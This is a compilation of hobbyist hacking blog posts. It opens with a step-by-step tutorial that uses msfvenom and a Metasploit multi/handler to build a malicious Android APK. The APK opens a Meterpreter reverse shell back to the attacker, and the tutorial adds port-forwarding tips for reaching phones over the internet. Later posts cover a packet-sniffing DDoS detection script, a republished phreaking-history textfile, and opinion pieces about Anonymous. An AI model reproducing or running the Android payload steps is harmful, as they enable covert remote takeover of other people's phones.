Hack Android Using Metasploit

This was a question asked to me by some people and today by one person.. So here's a short step by step tut for it:

1) Get some Linux os.. It's better for hacking
2) Open Terminal and type:

 msfvenom -p android/meterpreter/reverse_tcp LHOST=186.57.28.44 LPORT=4895 R >/root/FILENAME.apk

• -p => Specify Payload
• LHOST => Your IP* or DDNS
• LPORT => Port You want to listen on
• R => Means RAW Format
• >/root/FILENAME.apk => Location for File

NOTE: You should have port forwarding enabled.. If you don't, talk to your ISP or settings in router menu if you use WiFi...

Now before running that app on your android phone, you have to start a handler. You can do that using –

1. msfconsole
2. use exploit/multi/handler
3. set payload android/meterpreter/reverse_tcp
4. set LHOST 186.57.28.44 *
5. set LPORT 4895
6. exploit

Now Run the app on your android phone and you'll get a meterpreter session opened!!
NOTE – Before installing the app, Please tick "Allow installation from Unknown Sources" from Settings.

FAQ

1) HOW TO HACK ON WAN (NOT ON YOUR OWN WIFI/NETWORK)*
It's really easy and almost the same.
First You Need to get your public IP. You can find that from THIS WEBSITE.
You also need your private ip. Use ifconfig command in terminal to get that.
Now There are just two small changes in the above steps
i) In the msfvenom command, in LHOST, you need to enter your ‘PUBLIC IP'
ii) When creating a listener/handler, in LHOST, you need to enter your ‘PRIVATE IP'
That's IT!!
NOTE – You Need To Port forward The Port you used in your modem/router or it won't work.
2) Apk File made from msfvenom is 0 kb
That means you have some spelling or syntax error. Please recheck the command you entered, if its correct, recheck again!!
3) In Phone – Cannot Parse Package
Try Another File Manager, Download a free one from google store!!
4) In Phone – App Not Installed
You May Need to Sign Your APK file, newer android versions may give error. Refer to this site, and go to last to see steps on manually signing. LINK HERE
5) Kali as Virtual Machine
Virtual Box is known to cause problems, so use VMWare if possible. Also Please DONT USE NAT MODE, USE BRIDGED!!
If There's Any other problem, type in the comment!! I'll try my best to help!!

BYE!

Update & Upgrade Linux

-_-

Here's how you update and upgrade Linux based Operating Systems:

1) Open Terminal
2) Type:

 apt-get update && apt-get upgrade

Done

Bye!

How To Detect a DDoS Attack

Hello guys have you ever done a ddos attack before, well this your lucky article and this is going to show  you how to do just that so get ready to hack. This is a very serious attack and difficult to detect, where it is nearly impossible to guess whether the traffic is coming from a fake host or a real host. If in a DoS attack, traffic is coming from only one source then we can block that particular host. Based on certain assumptions, we can make rules to detect DDoS attacks. If the web server is running only traffic containing port 80, it should be allowed. Now, let’s go through a very simple code to detect a DDoS attack.
The program’s name is DDOS_detect1.py:

import socket

import struct

from datetime import datetime

s = socket.socket(socket.PF_PACKET, socket.SOCK_RAW, 8)

dict = {}

file_txt = open(“dos.txt”,’a’)

file_txt.writelines(“**********”)

t1= str(datetime.now())

file_txt.writelines(t1)

file_txt.writelines(“**********”)

file_txt.writelines(“\n”)

print “Detection Start …….”

D_val =10

D_val1 = D_val+10

while True:

pkt = s.recvfrom(2048)

ipheader = pkt[0][14:34]

ip_hdr = struct.unpack(“!8sB3s4s4s”,ipheader)

IP = socket.inet_ntoa(ip_hdr[3])

print “Source IP”, IP

if dict.has_key(IP):

dict[IP]=dict[IP]+1

print dict[IP]

if(dict[IP]>D_val) and (dict[IP]<D_val1) :

line = “DDOS Detected “

file_txt.writelines(line)

file_txt.writelines(IP)

file_txt.writelines(“\n”)

else:

dict[IP]=1 

we used a sniffer to get the packet’s source IP address. The file_txt = open(“dos.txt”,’a’) statement opens a file in append mode, and this dos. txt file is used as a logfile to detect the DDoS attack. Whenever the program runs, the file_txt.writelines(t1) statement writes the current time. The D_val =10 variable is an assumption just for the demonstration of the program. The assumption is made by viewing the statistics of hits from a particular IP. Consider a case of a tutorial website. The hits from the college and school’s IP would be more. If a huge number of requests come in from a new IP, then it might be a case of DoS. If the count of the incoming packets from one IP exceeds the D_val variable, then the IP is considered to be responsible for a DDoS attack. The D_val1 variable will be used later in the code to avoid redundancy. I hope you are familiar with the code before the if dict.has_key(IP): statement. This statement will check whether the key (IP address) exists in the dictionary or not. If the key exists in dict, then the dict[IP]=dict[IP]+1 statement increases the dict[IP] value by 1, which means that dict[IP] contains a count of packets that come from a particular IP.

The if(dict[IP]>D_val) and (dict[IP]<D_val1) : statements are the criteria to detect and write results in the dos.txt file; if(dict[IP]>D_val) detects whether the incoming packet’s count exceeds the D_val value or not. If it exceeds it, the subsequent statements will write the IP in dos.txt after getting new packets. To avoid redundancy, the (dict[IP]<D_val1) statement has been used. The upcoming statements will write the results in the dos.txt file. Run the program on a server and run mimp.py on the attacker’s machine.so there you have it guys and trust me by looking at this it is very simple to implement.

BYE!

The Future of Technology

The Future of Cyber Security and Technology

A year back I used to wonder why fans don't have any remote to control it and now there are fans with remote control and also a led light attached at the bottom. This may seen as a normal part of technological advancements but as we see this change always occurring, we also see a bunch of problems coming along with them. This is going to be a relatively long blog post and the completion may take some time, but after reading this you all will realize how important security is and how important it is to test the products for security loopholes before commercializing anything. Also how important updating the product can be and to contradict it, why you should keep some legacy products. So sit back and read this post. Enjoy!

Some basic facts

1) Technological advancements never stop and it's we who call for it always. Let's see a small situation: Many people protested about streets not being clean and that there was garbage dumped anywhere in Indian streets. The new government won the election and started a clean India campaign. Many people participated including the celebrities and other renowned persons. This not only bought a change in the society as a whole but also may influence other countries to cope up with the India in the case of cleanliness. I never admit that it has solved the problem completely and it may never do so. Cleanliness in India is like asking to remove poverty in the world. It never completely goes away. 

So now the government also launched a smartphone application for clean India. This application like any other BJP application focuses more on the face of Prime Minister rather can providing useful functions. But we can't deny that atleast we have an application from the governments side...That too an Android application. 

The point I wanted to make here was that this too is an example of technological advancement that will keep  happening and will never stop. It may take time, or delay a bit, but will and can never stop because we cannot live in isolation of what the world is doing.

2) Cyber Threats will never stop as well.. Some may seen freaked out by this statement but it's the universal truth now. As new technology comes in, new threats emerge and new precautions get formed. This is an ongoing cycle and there is nothing in the world that cannot be exploited. Nothing!

3) Internet is not hidden, it's open and ever increasing. Keep repeating the mantra: "what goes online, stays there forever" and you can be safe from many online threats. Stay to your roots because internet is not your home, it's just another means to entertain humans that humans made for themselves.

Harsh Truth

The harsh truth based on simple fact #2 is that every electronic gadget can be exploited and hacked.. This is not unknown that ATM machines can be hacked. Now many people say that ATM's have a small system that's why we can hack them, but the truth is that even if there was not a system in it and it was like a radio controlled money providing machine(though this idea makes no sense to even imagine), it would be hacked in some ways to spew out the money. When we can control a cockroach, we can do anything..

So here are some question found on Google which I will try to correctly answer:

#1. Can cars be hacked?

Ans. Yes. We can hack the dashboard, the music player(because it's a different entity, the controls(in-case of automatic cars) and now also the car opening automatic keys. There is research going on in various car manufacturing companies on how to solve this problem and how to make the cars more secure.

#2. Can we make artificial intelligence like 'Iron Man's Jarvis'?

Ans. Yes we can.. When you talk about artificial intelligence like Jarvis, it's possible and already made! Apple has pretty good voice assistance named "Siri" in it. Though many may say that it takes it's answers from internet and cannot be called an artificial intelligence, but these people should ask the makers of  "Iron Man" that why didn't they clarify that Jarvis could or could not take information from the internet? 

The only thing I can say is that if we want most of our questions answered without an internet, we need to have a whole football ground to keep our own computers at and then run a small mobile application to search offline. Is that what Jarvis means to these dumb people?.. Owning a football field and Google's servers?

#3 Can animals be hacked?

Ans. Haha, Yes. We can remote control a cockroach now any also other animals like mice. Now the time is near when we can have our own "living" mice to play with. 

Near future will bring inventions like controlling all the rodents with WiFi signal and playing with them, making them do weird stunts..

#4 Rise of digital warfare? Is it truth?

Ans. It was, it is, it will remain. Digital warfare was there from the time computers came in. It's the question of how do we define a war? Is war defined in terms of countries vs countries OR Blackhat's vs Countries?

I think that even the hackers, the useless script kiddies that conduct a ddos or boot attack on victims are the part of digital warfare. As for the hackers those who deface websites and other stuff to convey messages like "free some bullshit country" are part of a warfare.. And as for me, many of such ill minded people have a lot of support.

#5 Is Anonymous really harmful? What's their future?

Ans. Idk why this question comes up in my email? really... still stuck on Anonymous? There are a lot more, better organized groups that work towards conveying a message. Anonymous "was" notorious back in the days, but now it's a bunch of small hackers and street people trying to protest every second day. Do they bring a change? Yes, they do bring a change.. Give the credits to the old hackers who made the group notorious. As such, no one including the law enforcement care about the group. Yes, they do keep in touch with activities that go on in there just to make sure no one really does the harm, but we all know they concentrate more on "Million mask march" than hacking..

The future is predictable and as per my good prediction, they will slowly diminish but after a long time unless they do something really big. I mean apart from Million Mask.. Like if they hack some FBI or disclose some big enough secret to rock the world or even the USA as such.. Otherwise, they'll just be live other activist groups protesting on streets(just wearing a mask)...

With that being said, I also answered some question emailed to me.. You can also ask question on fb for direct answers.

Bye!

The History Of Hacking & Phreaking

DISCLAIMER: This file was originally written by: Raven of BOMB Squad 

 

              /\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\
              \      A BOM SQUAD RELEASE       /
              /        The History Of          \
              \     Hacking & Phreaking        /
               \/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/

                           By Raven

                         -=-=-=-=-=-

Okay boys and girls, children of all ages...Here's a
revolutionary idear....The announcements foist!

                         -=-=-=-=-=-

     The file we released on smashing up cop cars and getting
away, ya know?  Well, don't try it unless you got half a ton
of cocaine in the back seat, and a billion bucks on the dash!
The cops are wise, and are liable to open fire on you once
you start pulling backwards, so, don't attempt it unless you
have no other options.  Another thing - now they're air bags
are quicker-draining, so they can start the chase almost as
soon as you are off.

                         þ-þ-þ-þ-þ-þ

      The Garden Of Souls ú ???-ANA-RCHY ú BOM Squad WHQ
      Graveyard Shift ú COM-ING-SOON ú Courier/Public HQ
             êrete ú 201-984-1738 ú 201 Dist Site
      Criminal's Sanctum ú 908-888-4613 ú 908 Dist Site

               -> And Now, On With The Show! <-

Okay, folks...First of all, I wrote this because, well, a lot
of you fellow hacker/phreakers out there do all yer
stuff, but don't know your roots.  Hacking and phreaking have
been around for over 20 years now.  So,
without further adue, I present, the History Of Hacking,
and Phreaking!


             
         -=- The History Of Hacking & Phreaking -=-

     Believe it or not, but hacking and phreaking have been
around since the '60s.  Yep.  Hacking is a legacy!  Phreaking
came around some time about 10 years later.


                      -The 60's Hacker-

     These were back in the days when a teenager couldn't
even buy a computer (because of price), much less fit it in
his house.  The 'hackers' were the people the sysop's of
lamer PD boards would have you believe - people who spent
lots of time with their computer (hacking away at the
keyboard).
     The true hackers came about when Massachusetts Institute
of Technology employed some nerds to do some artificial
intelligence and computer work for them.  These guys actually
created the models for the terminal your working on right
now.  They were the true and original programmers and
engineers.
     Anyhow, these guys were working on a project called MAC
(Multiple-Access Computer, Machine-Aided Cognition, or Man
Against Computers...Take yer pick).  All goes well as these
guys write some basic programs, build operation systems, and
play 4 color chess games, until the MAC programmers go public
with a computer time sharing program.  The first BBS, and it
even had over 100 nodes!
     Of course, only other guys with main frames could access
this thing (i.e. - the government, other big schools, and big
companies).  These sysops who worked at MIT did their best to
control the badly maintained MAC system, but the hoards of
users cluttered up everything.
     Then, something magical happened.  A man called John
McCarthy, Ph.D., crashed the MAC system.  Soon, others took
sport in crashing this international network.  Companies were
able to take place in a crude form of industrial espionage on
the MAC buy 'eavesdropping' on rival's E-Mail, and those
cheap cardboard punch cards (the first computer disks) were
always being corrupted by batch-file viruses.  Hacking is
born.
     However, crashing the system and all other 'evil'
activities were encouraged.  From them, sysops learned from
mistakes, and the hackers took place in the hackers'
obsession - the desire to learn as much as possible about a
system.


                  -The 70's Hacker/Phreaker-

     The 70's were a magical decade, and a flying leap for
phone fraud.  The first half of the 70's was like the 60's in
respect to hacking.  In the second half, hacking escalated
into 80's hacking (see below).
     Besides hacking, though, the 70's produced the phone
phreaks.  Phreaking was born from the non-existent womb of a
blind child from Tennessee named Joe Engressia.  Joe was one
of the rare people born with perfect pitch.  Because of that
gift, Joe was able to manipulate some of the most
sophisticated and widespread technology in the world.
     Joe enjoyed the phone system.  Being a curious 8 year
old, he called recorded messages all over the world, because
it was free, and is was a good past time.  One day, he was
listening to a message and whistling.  When he hit a certain
tone, the message clicked off.  You or I might have hung up,
but curious 8 year olds don't.
     Joe fooled around with other numbers and the same pitch,
and found he could switch off any recorded message.  Joe
called his local phone company, and wanted to know why this
happened.  He didn't understand the explanation given, but he
did realize that he had stumbled on to a whole new world to
explore.
     How was Joe able to do this?  Joe had stumbled onto the
multifrequency system (known as MF to phreakers world wide).
The  purpose of this system was to do most of the the job a
human could do, but done cheaper and quicker by a machine.
     Joe used this system by whistling the right pitches at
the right times to get free calls.  Of course, he never
wanted to hurt the phone company.  He loved the phone
company.  It was merely curiosity which caused him to do this
all.
     Joe phreaked all the way into college (he was in college
around the early 70's).  While phreaking free calls back home
for some friends, he was caught.  Joe's case was a world wide
publicity case (beginning first with an article in Esquire in
1971).  Soon, he received calls from phreaks world wide
asking advice on certain pitches.  Joe Engressia had become
the phounding phather of phreaks.
     Several years before, in 1954, the phone company made a
large mistake.  They printed all the MF codes in their
Technical Journal, a book which was easily obtained then, but
has not been released to the public in over 15 years because
of the damage phreaks could do with it.  Phreaks learned the
MF, and began using everything from their mouths to pipe
organs to phreak calls.
     Then, the most ironic thing of all aided phreakers.
John Draper, an air force technician stationed over seas
discovered that if a toy whistle in boxes of Cap'n Crunch had
a hole covered up, it produced a pure 2600 cycle tone, the
exact pitch needed for a free call anywhere (at least it used
to be).  Soon, Draper was calling other phreaks all over the
world.  Paris, Peking, London, New York and more.
     Using his 2600 cycle whistle and other tools of the
trade, Draper set up a phreak underground.  It was a mass
node 'party-line' in which many phreaks talked to one another
at one time.  In the throne was Cap'n Crunch - John Draper's
handle.
     The phreakers exchanged knowledge, and soon combined
their ideas to build the blue box.  The blue box can reproduce
any MF pitch.  The whole thing came together in October,
1971, in Esquire magazine.  Ron Rosenbaum exposed the
phreaking world from Joe to Crunch in one article called
"Secrets Of The Little Blue Box".
     Rosenbaum distorted the phreaking world greatly.
According to him, Crunch had a van which was chock-full of
electronics.  Crunch would drive around the country side,
going from pay phone to pay phone, stealing cash from the
coin box for money, and placing calls to phreaker friends.
Occasionally, Crunch would call his 'mentor', Joe, for
advice.  Nah.  I don't think so.  Rosenbaum glorified the
phreaking world, making Crunch a romantic hero.
     Draper/Crunch was arrested, convicted, and did time.
While in the big house, several mafia inmates tried to
recruit him into a commercial blue-box front.  Draper
declined, and they knocked out a few of his teeth, and broke
his back.
     After leaving prison, Draper quit phreaking, and began
programming.  Last the world heard, he was head of a
programming division of Apple.


                      -The 80's Hacker-

     During the 1980's the hacker population probably went up
1000-fold.  Why?  For several reasons.  The first being that
the personal computer and clones were made available to the
public at cheap prices.  People could afford to buy a
terminal and set up a BBS.  And, where you find BBS's, you
find hackers.
     The second, and probably biggest reason was the movie
WarGames.  WarGames displayed hacking as a glamourous
profession.  It made hacking sound easy.  I once heard that
the estimate of hackers in the US increased by 600% after
WarGames.  Modem users also increased, but only by a mere
1200%.  This made hacking easy, though, because it was also
estimated that one third of "WarGames Generation Hackers" had
the password 'Joshua'.  If you have seen the movie, you know
that that name had some significance.  Many hackers didn't
like WarGames, though.  They thought it made hacking sound
like a pansy thing to do.  To non-hackers, though, WarGames
was great.
     The third reason is because of the mass publicity
surround WarGames and hacking.  If we had a controlled media,
probably the only hackers in the USA would be spies and
corporate computer techs.  The media increased the hacker
population by a lot, also.


             -The Hacker of The 90's and Beyond-

     Hacking of the 90's have basically been crashers of
BBS's and company boards.  There have been a few virus-smiths
around.  Piracy is always around.  Who knows what the future
brings in the world of hacking, phreaking, and anarchy? 

 

 BYE

SORRY TO ANONS

So this is my apology note to Anonymous!

So earlier this day I wrote an article stating it to be a fake group and full of show-offs. I still hold my position on it and still say that there are many fake people in it only for fame, but some are not.  This is an apology for those who feel my last blog post hurt them and those who have been working to change the world. I myself was am there for helping others and also asking for help because I'm not perfect and cannot beat the cyber crime world without help.

I don't know about others, but I joined Anons because I needed help and also knew that if I ever asked, I would get it. It's my mistake that I never asked for any help and expected too which was not justified by me.

Why Am I Apologizing?
So today the same time after writing my 1st post, I asked Anons help in taking out a small website which I had reported and had no idea how to take down.. So as not expected by me, the website was taken down due to direct reporting to the hosting company.
I'm happy to see that the group still holds the value and ready to help even after criticism.

And to the fake people who just post news and shit in the group: I still hate you and feel you all are attention grabbers..

Bye!

Anonymous: A BIG Joke

The only thing I like about anonymous is their mask. Nothing else makes them anonymous. You see over Facebook and other social-media websites flooding with "Anonymous" groups and wonder, "Are they really anonymous over here?".. Those who clain to hack for Anonymous are big jokers and let me tell you the holy truth:

I don't get why anonymous gets talked about so much, in a serious way. When I first heard about them, I thought they were awesome. It got me excited that there could be this group of people on the internet who were very computer savvy and revolutionary, and could make a difference. Since observing their activities over a time, though, that completely faded. At this point they're pretty much a joke. I don't understand why people talk about them so seriously. Literally all they do is take down websites for a few hours. Or lock people out of their social media accounts. Like...really? How does that impact anything whatsoever? Its just like an annoyance that the people have to deal with for a couple of hours. It makes no difference. It seemed to me, and still does, that if you truly have great hacking capabilities, you could probably actually do some stuff that could make a difference. Release information, alter things, or something. But they just shut websites down for a few hours. They do nothing of any significance. It's kind of a joke. 

The only reason hackers go with stupid people like those who claim to be so called "Anonymous" is because of fame. And believe me, it's all about fame and nothing else. There is no such brother or sisterhood in Anonymous. Everyone is on their own and it's a big joke because of various practical reasons:

1) It's not a group, it's an idea and I like it.. But who's there to give it a direction??
2) I cannot trust anyone cause even the feds can see all the activities we do there
3) People can dox you if they're not in good terms with you
4) Do they really help? The only help I've got till date is the sharing and liking of my posts...
5) Are all of em' hackers? HELL TO THE NO! Most are jokers and homeless people wanting to find "justice" in the capitalist society which I can sadly but surely tell they won't ever get.

Now how much more crappy can this be?
So I reported about a dozen and more terrorist affiliated and directly linked profiles on Facebook, Twitter and other. I also exposed some IP Addresses linked to ISIS on the DeepWeb including the Tor network and I2P. But did anyone care helping except from saying "good". NO! I can't blame them cause they're just there for fame and don't give any shit about the basic idea of fighting the wrong. They just come and write shit loads of posts and share blogs like mine to show off that they help, but liek my previous blog posts I would again like to say, noone gives a shit about the daily news posts about what we already see everyday on Google. YOU ARE NOT SHARING AND CARING BUT ANNOYING EVERYONE.
The only people I say work and do a great job have become my friends but still many are noobs. Atleast they learn and do it. But atlast the truth remains the same, "Anonymous is an idea, and very few people are real, rest all are attention grabbers."

Bye! 
And YES, Take this offense seriously.